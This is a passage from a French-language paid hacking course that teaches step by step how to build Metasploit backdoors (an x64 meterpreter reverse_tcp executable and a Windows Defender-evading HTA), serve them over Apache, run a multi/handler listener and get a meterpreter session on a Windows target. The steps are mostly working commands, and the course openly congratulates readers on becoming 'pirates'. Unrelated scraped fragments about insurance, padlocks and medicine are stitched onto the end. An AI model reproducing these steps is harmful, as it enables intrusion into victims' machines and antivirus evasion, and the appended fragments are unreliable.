Sur l’image ci-dessus nous observons des options de « multi/handler a remplirai ».

 Nous changerons d’abord le payload. Car le payload que nous avons utilisé est le payload de l’architecture « x64 » or le payload utilisé par notre module

multi/handler par défaut est pour l’architecture « x86 ».

 Pour le changer en architecture x64 comme le payload utilisé pour faire notre backdoor nous allons mettre cette commande : « set payload Windows/x64/meterpreter/reverse_tcp ». Puis valider.

(53)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 53

 Nous voyons que le « LHOST » est vide or il doit contenir notre adresse ip

« ifconfig » comme dans la création de notre backdoor ci-dessus :

 Pour le changer ou le remplir nous devons mettre cette commande « set lhost + ip (votre ip ; exemple mon ip est le 10.10.1.2 cela équivaut à mettre : set lhost 10.10.1.2) ».

 Nous voyons que le port est le port par défaut or nous avons mis un port

« lport » lorsque nous étions dans la création de notre backdoor.

 Pour changer cela nous devons mettre la commande suivante :

« set lport + le port que nous avons mis lors de la création de notre backdoor »

 Pour exécuter notre écoute nous allons mettre la commande suivante :

 La commande : « run ou exploit ».

NB : Cette configuration est faite avant le lancement du « backdoor » et son exécution par la cible.

Maintenant allons exécuter le backdoor comme la cible le ferais pour simuler une attaque réel avec piratage qui se fera comme dans un cas réel

 ALLONS sur notre machine cible « Windows 7 ou 8 ou 10 » mais :

 Il faut désactiver les pare-feu

 Mettre la machine dans le même réseau que kali « soit réseau nat ou accès par pont selon ce que vous avez mis dans kali »

(54)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 54

 ALLONS dans le navigateur de la cible :

Une fois dans le navigateur de votre cible, vous allez tapez ceci : « http://ip de kali/nom du backdoor que vous avez créé avec son extension. »

Exemple : « http://10.10.1.17/backdoorgsi1.exe » voici comment transférer et télécharger le backdoor dans la machine cible facilement, voilà pourquoi il faut envoyer le backdoor dans le dossier « var/www/html » et également activer le service apache2 depuis le début.

Vous enregistrez le « backdoor » sur le bureau.

 Exécutons le « backdoor » : allons sur notre machine kali. Vous allez percevoir « une session » et un « meterpreter ». Cela veut dire que vous venez de pirater la machine x64 bites que vient d’exécuter votre « backdoor ».

Nous allons vérifiez si nous avons bien piraté la machine :

(55)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 55

Pour sortir de la session tapez : background

BIENVENU A TOUS. VOUS ETES MAINTENANT DES PIRATES INFORMATIQUES. CE SONT LA LES PRATIQUES LES PLUS UTILISES MEME PAR LES EXPERTS. VEUILLEZ VRAIMENT MAITRISER, FAIRE ET REFAIRE LES PRATIQUES.

NOUS PASSONS A LA MEME PRATIQUE AVEC UN BACKDOOR EN HTA :

 Commençons par créer un backdoor en hta avec « evasion » :

 Nous allons tout d’abord chercher « evasion » sur msfconsole,

 Une fois cette panoplie de module d’evasion s’affiche nous allons utiliser le module qui a pour indice « 6 » ou pour

nom « evasion/Windows/windows_defender_js_hta ».

Pour l’utilisation d’un module mettez soit « use + l’indice du module, dans notre cas

« use 6 » » ou « use + le nom complet du module ».

Une fois utilisée nous constatons que nous sommes en payload x64 donc piratage des architectures x64.

Passons à la configuration :

(56)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 56

 Affichez les options avec la commande : « options »

 Changez le nom de la sortie du backdoor avec la commande : « set filename +nom » que vous souhaitez mais il faut que l’extension soit en hta. Exemple : gsi.hta»

 Changez le port du backdoor avec la commande : « set lport + le port que vous voulez »

 Tapez « set lhost +votre ip ». Exemple : (set lhost 10.10.1.17).

 Puis exécutez la sortie avec la commande : « run ou exploit »

 Changez l’emplacement du backdoor pour le télécharger facilement chez la cible en l’envoyant dans le dossier « var/www/html ».

Une fois les étapes fini nous allons maintenant allez sur notre multi/handler pour la configuration de l’écoute du port.

Pour ceux qui ont mis background pour continuer tapez ceci :

 Nous tapons « use multi/handler »

 Comme la configuration a été fait au préalable en payload x64 ou si vous avez supprimé tout mettez ceci : « set payload

Windows/x64/meterpreter/reverse_tcp »

 Puis tapez « options »

 En suite pour ceux qui ne sont pas sortie du terminal tapez ceci :

 « set lport + le nouveau port que vous avez mis lors de la création du backdoor ». Exemple si j’ai mis sur le backdoor un port 650, je tape : (set lport 650) »

 Puis exécuter avec « run » Pour ceux qui ont tout effacé tapez ceci :

 Nous tapons « use multi/handler »

(57)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 57

 Mettez ceci : « set payload Windows/x64/meterpreter/reverse_tcp »

 Puis tapez « options »

 Tapez : « set lport + le nouveau port que vous avez mis lors de la création du backdoor. Exemple si j’ai mis sur le backdoor un port 650, je tape : (set lport 650) »

 Mettez « set lhost +ip ». Exemple : set lhost 10.10.1.17

 Puis exécuter avec « run »

Une fois la configuration faite nous allons sur notre machine Windows cible :

Dans le navigateur de la cible puis mettons « http://ip de kali / le nom donner lors de la configuration du backdoor en hta. » exemple : « http://10.10.1.17/gsi.hta ».

Exécuter Le Backdoor.

(58)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 58

Une fois le backdoor exécuté nous allons sur notre kali pour voir si nous avons « une session » et que nous avons « un meterpreter » ce qui voudra dire que la machine a été piratée.

Nous venons de pirater avec un autre type de backdoor une machine Windows. Nous pouvons vérifier la machine avec la commande : « sysinfo ».

Nous venons d’apprendre à pirater une machine avec un backdoor.

Mais savez-vous qu’il existe une méthode de piratage qui ne nécessite pas que la cible exécute quoi que ce soit et que vous aurez une session meterpreter sur la machine ? Donc piraté la cible sans avoir besoin de sa collaboration.

(59)

GSIMEL : HACKING PENETRATION SYSTÈME

jftsavoir@gmail.com 59

POUR ACHAT :

WHATSAPP : +225 0173715172

CONTACTS : +225 0173847278

Références

Documents relatifs

Recherches bibliographiques à la demande, accès aux articles en ligne, aide à la préparation d’exposés, congrès, projets de recherche, aide à la bibliométrie (facteurs

A la réception de votre colis, votre dulcinée ajoute un deuxième cadenas qu’elle ferme avec sa propre clé et vous renvoie la boite. Il ne vous reste plus qu’à déverrouiller

jetez les papiers dans la poubelle. asseyez-

Si vous avez déjà un marché public en cours, vous pouvez utiliser une procédure de « petits lots » pour acheter des produits locaux présents dans l’Ain..

Tout ce qui peut faire obstacle sur les voies biliaires tels que des obstacles au niveau du pancréas ou des ganglions au niveau du hile hépatique, peut se traduire par un

Le nouveau type que nous allons utiliser, le type prend plus de place en mémoire, mais se fera un plaisir de stocker tous les caractères que vous voulez, en ASCII étendu voire

Long terme Clients aisés qui peuvent se permettre des paiements plus élevés et rapprochés et veulent une assurance permanente avec une valeur de rachat garantie. Assurance

• Pour adhérer à ce contrat vous devez relever du Régime Obligatoire d’assurance maladie des travailleurs non salariés et vous engager à être à jour, pendant toute la durée